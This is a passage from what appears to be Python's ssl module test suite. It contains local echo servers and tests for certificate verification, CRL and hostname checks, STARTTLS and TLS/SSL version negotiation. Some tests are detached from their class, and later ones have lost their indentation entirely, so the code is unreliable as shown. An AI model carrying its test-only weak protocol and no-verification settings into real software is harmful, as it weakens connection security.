                    handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
                self.running = False
                self.server.stop()
                self.close()
                return False
            else:
                self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
                if self.server.context.verify_mode == ssl.CERT_REQUIRED:
                    cert = self.sslconn.getpeercert()
                    if support.verbose and self.server.chatty:
                        sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
                    cert_binary = self.sslconn.getpeercert(True)
                    if support.verbose and self.server.chatty:
                        sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
                cipher = self.sslconn.cipher()
                if support.verbose and self.server.chatty:
                    sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
                    sys.stdout.write(" server: selected protocol is now "
                                     + str(self.sslconn.selected_npn_protocol()) + "\n")
                return True

        def read(self):
            # Read from whichever layer (SSL or plain) is active.
            if self.sslconn:
                return self.sslconn.read()
            else:
                return self.sock.recv(1024)

        def write(self, bytes):
            # Write through whichever layer (SSL or plain) is active.
            if self.sslconn:
                return self.sslconn.write(bytes)
            else:
                return self.sock.send(bytes)

        def close(self):
            # Closing the SSL wrapper also closes the underlying socket.
            if self.sslconn:
                self.sslconn.close()
            else:
                self.sock.close()

        def run(self):
            self.running = True
            if not self.server.starttls_server:
                # Plain servers handshake immediately; STARTTLS servers
                # wait for the client's STARTTLS command.
                if not self.wrap_conn():
                    return
            while self.running:
                try:
                    msg = self.read()
                    stripped = msg.strip()
                    if not stripped:
                        # eof, so quit this handler
                        self.running = False
                        try:
                            self.sock = self.sslconn.unwrap()
                        except OSError:
                            # Many tests shut the TCP connection down
                            # without an SSL shutdown. This causes
                            # unwrap() to raise OSError with errno=0!
                            pass
                        else:
                            self.sslconn = None
                        self.close()
                    elif stripped == b'over':
                        if support.verbose and self.server.connectionchatty:
                            sys.stdout.write(" server: client closed connection\n")
                        self.close()
                        return
                    elif (self.server.starttls_server and
                          stripped == b'STARTTLS'):
                        # Acknowledge, then upgrade the connection to SSL.
                        if support.verbose and self.server.connectionchatty:
                            sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
                        self.write(b"OK\n")
                        if not self.wrap_conn():
                            return
                    elif (self.server.starttls_server and self.sslconn
                          and stripped == b'ENDTLS'):
                        # Acknowledge, then drop back to plaintext.
                        if support.verbose and self.server.connectionchatty:
                            sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
                        self.write(b"OK\n")
                        self.sock = self.sslconn.unwrap()
                        self.sslconn = None
                        if support.verbose and self.server.connectionchatty:
                            sys.stdout.write(" server: connection is now unencrypted...\n")
                    elif stripped == b'CB tls-unique':
                        # Report our channel-binding data to the client.
                        if support.verbose and self.server.connectionchatty:
                            sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
                        data = self.sslconn.get_channel_binding("tls-unique")
                        self.write(repr(data).encode("us-ascii") + b"\n")
                    else:
                        # Default echo behaviour: send back the message
                        # lowercased.
                        if (support.verbose and
                            self.server.connectionchatty):
                            ctype = (self.sslconn and "encrypted") or "unencrypted"
                            sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
                                             % (msg, ctype, msg.lower(), ctype))
                        self.write(msg.lower())
                except OSError:
                    if self.server.chatty:
                        handle_error("Test server failure:\n")
                    self.close()
                    self.running = False
                    # normally, we'd just stop here, but for the test
                    # harness, we want to stop the server
                    self.server.stop()

    def __init__(self, certificate=None, ssl_version=None,
                 certreqs=None, cacerts=None,
                 chatty=True, connectionchatty=False, starttls_server=False,
                 npn_protocols=None, alpn_protocols=None,
                 ciphers=None, context=None):
        # Either take a ready-made context, or build one from the
        # individual keyword arguments.
        if context:
            self.context = context
        else:
            self.context = ssl.SSLContext(ssl_version
                                          if ssl_version is not None
                                          else ssl.PROTOCOL_TLSv1)
            self.context.verify_mode = (certreqs if certreqs is not None
                                        else ssl.CERT_NONE)
            if cacerts:
                self.context.load_verify_locations(cacerts)
            if certificate:
                self.context.load_cert_chain(certificate)
            if npn_protocols:
                self.context.set_npn_protocols(npn_protocols)
            if alpn_protocols:
                self.context.set_alpn_protocols(alpn_protocols)
            if ciphers:
                self.context.set_ciphers(ciphers)
        self.chatty = chatty
        self.connectionchatty = connectionchatty
        self.starttls_server = starttls_server
        self.sock = socket.socket()
        self.port = support.bind_port(self.sock)
        self.flag = None
        self.active = False
        # Per-connection results collected for the tests to inspect.
        self.selected_npn_protocols = []
        self.selected_alpn_protocols = []
        self.shared_ciphers = []
        self.conn_errors = []
        threading.Thread.__init__(self)
        self.daemon = True

    def __enter__(self):
        self.start(threading.Event())
        self.flag.wait()
        return self

    def __exit__(self, *args):
        self.stop()
        self.join()

    def start(self, flag=None):
        self.flag = flag
        threading.Thread.start(self)

    def run(self):
        # Short accept timeout so stop() is noticed promptly.
        self.sock.settimeout(0.05)
        self.sock.listen()
        self.active = True
        if self.flag:
            # signal an event
            self.flag.set()
        while self.active:
            try:
                newconn, connaddr = self.sock.accept()
                if support.verbose and self.chatty:
                    sys.stdout.write(' server: new connection from '
                                     + repr(connaddr) + '\n')
                handler = self.ConnectionHandler(self, newconn, connaddr)
                handler.start()
                handler.join()
            except socket.timeout:
                pass
            except KeyboardInterrupt:
                self.stop()
        self.sock.close()

    def stop(self):
        self.active = False
class AsyncoreEchoServer(threading.Thread):
    # this one's based on asyncore.dispatcher
    """An asyncore-based SSL echo server, driven by asyncore.loop()
    running in a background thread.  Usable as a context manager."""

    class EchoServer (asyncore.dispatcher):

        class ConnectionHandler (asyncore.dispatcher_with_send):

            def __init__(self, conn, certfile):
                # Wrap the accepted socket with the handshake deferred;
                # _do_ssl_handshake() drives it from the event loop.
                self.socket = ssl.wrap_socket(conn, server_side=True,
                                              certfile=certfile,
                                              do_handshake_on_connect=False)
                asyncore.dispatcher_with_send.__init__(self, self.socket)
                self._ssl_accepting = True
                self._do_ssl_handshake()

            def readable(self):
                if isinstance(self.socket, ssl.SSLSocket):
                    # Data may be buffered inside OpenSSL without the
                    # raw socket being readable; drain it here.
                    while self.socket.pending() > 0:
                        self.handle_read_event()
                return True

            def _do_ssl_handshake(self):
                # Advance the handshake; WANT_READ/WANT_WRITE just mean
                # "try again on the next event".
                try:
                    self.socket.do_handshake()
                except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
                    return
                except ssl.SSLEOFError:
                    return self.handle_close()
                except ssl.SSLError:
                    raise
                except OSError as err:
                    if err.args[0] == errno.ECONNABORTED:
                        return self.handle_close()
                else:
                    self._ssl_accepting = False

            def handle_read(self):
                if self._ssl_accepting:
                    self._do_ssl_handshake()
                else:
                    # Echo back the data, lowercased.
                    data = self.recv(1024)
                    if support.verbose:
                        sys.stdout.write(" server: read %s from client\n" % repr(data))
                    if not data:
                        self.close()
                    else:
                        self.send(data.lower())

            def handle_close(self):
                self.close()
                if support.verbose:
                    sys.stdout.write(" server: closed connection %s\n" % self.socket)

            def handle_error(self):
                raise

        def __init__(self, certfile):
            self.certfile = certfile
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.port = support.bind_port(sock, '')
            asyncore.dispatcher.__init__(self, sock)
            self.listen(5)

        def handle_accepted(self, sock_obj, addr):
            if support.verbose:
                sys.stdout.write(" server: new connection from %s:%s\n" %addr)
            self.ConnectionHandler(sock_obj, self.certfile)

        def handle_error(self):
            raise

    def __init__(self, certfile):
        self.flag = None
        self.active = False
        self.server = self.EchoServer(certfile)
        self.port = self.server.port
        threading.Thread.__init__(self)
        self.daemon = True

    def __str__(self):
        return "<%s %s>" % (self.__class__.__name__, self.server)

    def __enter__(self):
        self.start(threading.Event())
        self.flag.wait()
        return self

    def __exit__(self, *args):
        if support.verbose:
            sys.stdout.write(" cleanup: stopping server.\n")
        self.stop()
        if support.verbose:
            sys.stdout.write(" cleanup: joining server thread.\n")
        self.join()
        if support.verbose:
            sys.stdout.write(" cleanup: successfully joined.\n")

    def start (self, flag=None):
        self.flag = flag
        threading.Thread.start(self)

    def run(self):
        self.active = True
        if self.flag:
            self.flag.set()
        while self.active:
            try:
                # Poll the asyncore event loop in 1-second slices so
                # stop() can break us out of the loop.
                asyncore.loop(1)
            except:
                pass

    def stop(self):
        self.active = False
        self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
                       chatty=True, connectionchatty=False, sni_name=None):
    """
    Launch a server, connect a client to it and try various reads
    and writes.

    Returns a dict of connection statistics (cipher, peercert,
    negotiated protocols, version, plus the server-side protocol and
    shared-cipher lists) for the caller to assert on.
    """
    stats = {}
    server = ThreadedEchoServer(context=server_context,
                                chatty=chatty,
                                connectionchatty=False)
    with server:
        with client_context.wrap_socket(socket.socket(),
                                        server_hostname=sni_name) as s:
            s.connect((HOST, server.port))
            # Exercise all three buffer-like argument types.
            for arg in [indata, bytearray(indata), memoryview(indata)]:
                if connectionchatty:
                    if support.verbose:
                        sys.stdout.write(
                            " client: sending %r...\n" % indata)
                s.write(arg)
                outdata = s.read()
                if connectionchatty:
                    if support.verbose:
                        sys.stdout.write(" client: read %r\n" % outdata)
                # The echo server lowercases what it receives.
                if outdata != indata.lower():
                    raise AssertionError(
                        "bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
                        % (outdata[:20], len(outdata),
                           indata[:20].lower(), len(indata)))
            # 'over' tells the server's handler to end the connection.
            s.write(b"over\n")
            if connectionchatty:
                if support.verbose:
                    sys.stdout.write(" client: closing connection.\n")
            stats.update({
                'compression': s.compression(),
                'cipher': s.cipher(),
                'peercert': s.getpeercert(),
                'client_alpn_protocol': s.selected_alpn_protocol(),
                'client_npn_protocol': s.selected_npn_protocol(),
                'version': s.version(),
            })
            s.close()
        stats['server_alpn_protocols'] = server.selected_alpn_protocols
        stats['server_npn_protocols'] = server.selected_npn_protocols
        stats['server_shared_ciphers'] = server.shared_ciphers
    return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
                       certsreqs=None, server_options=0, client_options=0):
    """
    Try to SSL-connect using *client_protocol* to *server_protocol*.
    If *expect_success* is true, assert that the connection succeeds,
    if it's false, assert that the connection fails.
    Also, if *expect_success* is a string, assert that it is the protocol
    version actually used by the connection.
    """
    if certsreqs is None:
        certsreqs = ssl.CERT_NONE
    certtype = {
        ssl.CERT_NONE: "CERT_NONE",
        ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
        ssl.CERT_REQUIRED: "CERT_REQUIRED",
    }[certsreqs]
    if support.verbose:
        # Braces in the output mark a combination expected to fail.
        formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
        sys.stdout.write(formatstr %
                         (ssl.get_protocol_name(client_protocol),
                          ssl.get_protocol_name(server_protocol),
                          certtype))
    client_context = ssl.SSLContext(client_protocol)
    client_context.options |= client_options
    server_context = ssl.SSLContext(server_protocol)
    server_context.options |= server_options
    # NOTE: we must enable "ALL" ciphers on the client, otherwise an
    # SSLv23 client will send an SSLv3 hello (rather than SSLv2)
    # starting from OpenSSL 1.0.0 (see issue #8322).
    if client_context.protocol == ssl.PROTOCOL_SSLv23:
        client_context.set_ciphers("ALL")
    # Both sides use the same self-signed cert for simplicity.
    for ctx in (client_context, server_context):
        ctx.verify_mode = certsreqs
        ctx.load_cert_chain(CERTFILE)
        ctx.load_verify_locations(CERTFILE)
    try:
        stats = server_params_test(client_context, server_context,
                                   chatty=False, connectionchatty=False)
    # Protocol mismatch can result in either an SSLError, or a
    # "Connection reset by peer" error.
    except ssl.SSLError:
        if expect_success:
            raise
    except OSError as e:
        if expect_success or e.errno != errno.ECONNRESET:
            raise
    else:
        if not expect_success:
            raise AssertionError(
                "Client protocol %s succeeded with server protocol %s!"
                % (ssl.get_protocol_name(client_protocol),
                   ssl.get_protocol_name(server_protocol)))
        elif (expect_success is not True
              and expect_success != stats['version']):
            raise AssertionError("version mismatch: expected %r, got %r"
                                 % (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
    """Basic test of an SSL client connecting to a server"""
    if support.verbose:
        sys.stdout.write("\n")
    for protocol in PROTOCOLS:
        with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
            # The same context serves both client and server sides.
            context = ssl.SSLContext(protocol)
            context.load_cert_chain(CERTFILE)
            server_params_test(context, context,
                               chatty=True, connectionchatty=True)
def test_getpeercert(self):
    # Sanity-check the contents of getpeercert() for the test cert.
    if support.verbose:
        sys.stdout.write("\n")
    context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
    context.verify_mode = ssl.CERT_REQUIRED
    context.load_verify_locations(CERTFILE)
    context.load_cert_chain(CERTFILE)
    server = ThreadedEchoServer(context=context, chatty=False)
    with server:
        s = context.wrap_socket(socket.socket(),
                                do_handshake_on_connect=False)
        s.connect((HOST, server.port))
        # getpeercert() raise ValueError while the handshake isn't
        # done.
        with self.assertRaises(ValueError):
            s.getpeercert()
        s.do_handshake()
        cert = s.getpeercert()
        self.assertTrue(cert, "Can't get peer certificate.")
        cipher = s.cipher()
        if support.verbose:
            sys.stdout.write(pprint.pformat(cert) + '\n')
            sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
        if 'subject' not in cert:
            self.fail("No subject field in certificate: %s." %
                      pprint.pformat(cert))
        if ((('organizationName', 'Python Software Foundation'),)
            not in cert['subject']):
            self.fail(
                "Missing or invalid 'organizationName' field in certificate subject; "
                "should be 'Python Software Foundation'.")
        self.assertIn('notBefore', cert)
        self.assertIn('notAfter', cert)
        # Validity period must be a non-empty interval.
        before = ssl.cert_time_to_seconds(cert['notBefore'])
        after = ssl.cert_time_to_seconds(cert['notAfter'])
        self.assertLess(before, after)
        s.close()
@unittest.skipUnless(have_verify_flags(),
                     "verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
    # Three scenarios: default flags pass; CRL checking without a CRL
    # loaded fails; CRL checking with the CA's CRL loaded passes.
    if support.verbose:
        sys.stdout.write("\n")
    server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    server_context.load_cert_chain(SIGNED_CERTFILE)
    context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    context.verify_mode = ssl.CERT_REQUIRED
    context.load_verify_locations(SIGNING_CA)
    tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
    self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
    # VERIFY_DEFAULT should pass
    server = ThreadedEchoServer(context=server_context, chatty=True)
    with server:
        with context.wrap_socket(socket.socket()) as s:
            s.connect((HOST, server.port))
            cert = s.getpeercert()
            self.assertTrue(cert, "Can't get peer certificate.")
    # VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
    context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
    server = ThreadedEchoServer(context=server_context, chatty=True)
    with server:
        with context.wrap_socket(socket.socket()) as s:
            with self.assertRaisesRegex(ssl.SSLError,
                                        "certificate verify failed"):
                s.connect((HOST, server.port))
    # now load a CRL file. The CRL file is signed by the CA.
    context.load_verify_locations(CRLFILE)
    server = ThreadedEchoServer(context=server_context, chatty=True)
    with server:
        with context.wrap_socket(socket.socket()) as s:
            s.connect((HOST, server.port))
            cert = s.getpeercert()
            self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
    # check_hostname semantics: matching name passes, mismatching name
    # raises CertificateError, and omitting server_hostname is an error.
    if support.verbose:
        sys.stdout.write("\n")
    server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    server_context.load_cert_chain(SIGNED_CERTFILE)
    context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    context.verify_mode = ssl.CERT_REQUIRED
    context.check_hostname = True
    context.load_verify_locations(SIGNING_CA)
    # correct hostname should verify
    server = ThreadedEchoServer(context=server_context, chatty=True)
    with server:
        with context.wrap_socket(socket.socket(),
                                 server_hostname="localhost") as s:
            s.connect((HOST, server.port))
            cert = s.getpeercert()
            self.assertTrue(cert, "Can't get peer certificate.")
    # incorrect hostname should raise an exception
    server = ThreadedEchoServer(context=server_context, chatty=True)
    with server:
        with context.wrap_socket(socket.socket(),
                                 server_hostname="invalid") as s:
            with self.assertRaisesRegex(ssl.CertificateError,
                                        "hostname 'invalid' doesn't match 'localhost'"):
                s.connect((HOST, server.port))
    # missing server_hostname arg should cause an exception, too
    server = ThreadedEchoServer(context=server_context, chatty=True)
    with server:
        with socket.socket() as s:
            with self.assertRaisesRegex(ValueError,
                                        "check_hostname requires server_hostname"):
                context.wrap_socket(s)
def test_wrong_cert(self):
    """Connecting when the server rejects the client's certificate

    Launch a server with CERT_REQUIRED, and check that trying to
    connect to it with a wrong client certificate fails.
    """
    certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
                            "wrongcert.pem")
    server = ThreadedEchoServer(CERTFILE,
                                certreqs=ssl.CERT_REQUIRED,
                                cacerts=CERTFILE, chatty=False,
                                connectionchatty=False)
    with server, \
            socket.socket() as sock, \
            ssl.wrap_socket(sock,
                            certfile=certfile,
                            ssl_version=ssl.PROTOCOL_TLSv1) as s:
        try:
            # Expect either an SSL error about the server rejecting
            # the connection, or a low-level connection reset (which
            # sometimes happens on Windows)
            s.connect((HOST, server.port))
        except ssl.SSLError as e:
            if support.verbose:
                sys.stdout.write("\nSSLError is %r\n" % e)
        except OSError as e:
            if e.errno != errno.ECONNRESET:
                raise
            if support.verbose:
                sys.stdout.write("\nsocket.error is %r\n" % e)
        else:
            self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
    """A brutal shutdown of an SSL server should raise an OSError
    in the client when attempting handshake.
    """
    listener_ready = threading.Event()
    listener_gone = threading.Event()
    s = socket.socket()
    port = support.bind_port(s, HOST)
    # `listener` runs in a thread. It sits in an accept() until
    # the main thread connects. Then it rudely closes the socket,
    # and sets Event `listener_gone` to let the main thread know
    # the socket is gone.
    def listener():
        s.listen()
        listener_ready.set()
        newsock, addr = s.accept()
        newsock.close()
        s.close()
        listener_gone.set()
    def connector():
        listener_ready.wait()
        with socket.socket() as c:
            c.connect((HOST, port))
            # Wait until the server side has definitely closed before
            # attempting the SSL handshake.
            listener_gone.wait()
            try:
                ssl_sock = ssl.wrap_socket(c)
            except OSError:
                pass
            else:
                self.fail('connecting to closed SSL socket should have failed')
    t = threading.Thread(target=listener)
    t.start()
    try:
        connector()
    finally:
        t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
                     "OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
    """Connecting to an SSLv2 server with various client options"""
    if support.verbose:
        sys.stdout.write("\n")
    # SSLv2 <-> SSLv2 works with any certificate requirement...
    try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
    try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
    try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
    # ...but an SSLv2 server rejects newer-protocol clients.
    try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
    if hasattr(ssl, 'PROTOCOL_SSLv3'):
        try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
    try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
    # SSLv23 client with specific SSL options
    if no_sslv2_implies_sslv3_hello():
        # No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
        try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
                           client_options=ssl.OP_NO_SSLv2)
    try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
                       client_options=ssl.OP_NO_SSLv3)
    try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
                       client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
    """Connecting to an SSLv23 server with various client options"""
    if support.verbose:
        sys.stdout.write("\n")
    if hasattr(ssl, 'PROTOCOL_SSLv2'):
        try:
            try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
        except OSError as x:
            # this fails on some older versions of OpenSSL (0.9.7l, for instance)
            if support.verbose:
                sys.stdout.write(
                    " SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
                    % str(x))
    # An SSLv23 server accepts SSLv23/TLSv1 clients (SSLv3 is disabled)
    # regardless of the certificate requirement.
    if hasattr(ssl, 'PROTOCOL_SSLv3'):
        try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
    if hasattr(ssl, 'PROTOCOL_SSLv3'):
        try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
    if hasattr(ssl, 'PROTOCOL_SSLv3'):
        try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
    # Server with specific SSL options
    if hasattr(ssl, 'PROTOCOL_SSLv3'):
        try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
                           server_options=ssl.OP_NO_SSLv3)
    # Will choose TLSv1
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
                       server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
                       server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
                     "OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
    """Connecting to an SSLv3 server with various client options"""
    if support.verbose:
        sys.stdout.write("\n")
    # SSLv3 <-> SSLv3 works with any certificate requirement...
    try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
    try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
    try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
    # ...but other protocol versions are rejected.
    if hasattr(ssl, 'PROTOCOL_SSLv2'):
        try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
    try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
                       client_options=ssl.OP_NO_SSLv3)
    try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
    if no_sslv2_implies_sslv3_hello():
        # No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
        try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
                           False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
    def test_starttls(self):
        """Switching from clear text to encrypted and back again.

        Drives a scripted message exchange against a STARTTLS-capable
        echo server: plain-text sends until "STARTTLS" is acknowledged,
        TLS-wrapped traffic until "ENDTLS" is acknowledged, then plain
        text again.  `wrapped` tracks which mode the client is in.
        """
        msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
        server = ThreadedEchoServer(CERTFILE,
                                    ssl_version=ssl.PROTOCOL_TLSv1,
                                    starttls_server=True,
                                    chatty=True,
                                    connectionchatty=True)
        wrapped = False
        with server:
            s = socket.socket()
            s.setblocking(1)
            s.connect((HOST, server.port))
            if support.verbose:
                sys.stdout.write("\n")
            for indata in msgs:
                if support.verbose:
                    sys.stdout.write(
                        " client: sending %r...\n" % indata)
                # Send over whichever channel (TLS or plain) is active.
                if wrapped:
                    conn.write(indata)
                    outdata = conn.read()
                else:
                    s.send(indata)
                    outdata = s.recv(1024)
                msg = outdata.strip().lower()
                if indata == b"STARTTLS" and msg.startswith(b"ok"):
                    # STARTTLS ok, switch to secure mode
                    if support.verbose:
                        sys.stdout.write(
                            " client: read %r from server, starting TLS...\n"
                            % msg)
                    conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
                    wrapped = True
                elif indata == b"ENDTLS" and msg.startswith(b"ok"):
                    # ENDTLS ok, switch back to clear text
                    if support.verbose:
                        sys.stdout.write(
                            " client: read %r from server, ending TLS...\n"
                            % msg)
                    # unwrap() returns the underlying plain socket.
                    s = conn.unwrap()
                    wrapped = False
                else:
                    if support.verbose:
                        sys.stdout.write(
                            " client: read %r from server\n" % msg)
            if support.verbose:
                sys.stdout.write(" client: closing connection.\n")
            # Tell the server we are done, over whichever channel is active.
            if wrapped:
                conn.write(b"over\n")
            else:
                s.send(b"over\n")
            if wrapped:
                conn.close()
            else:
                s.close()
def test_socketserver(self):
"""Using a SocketServer to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
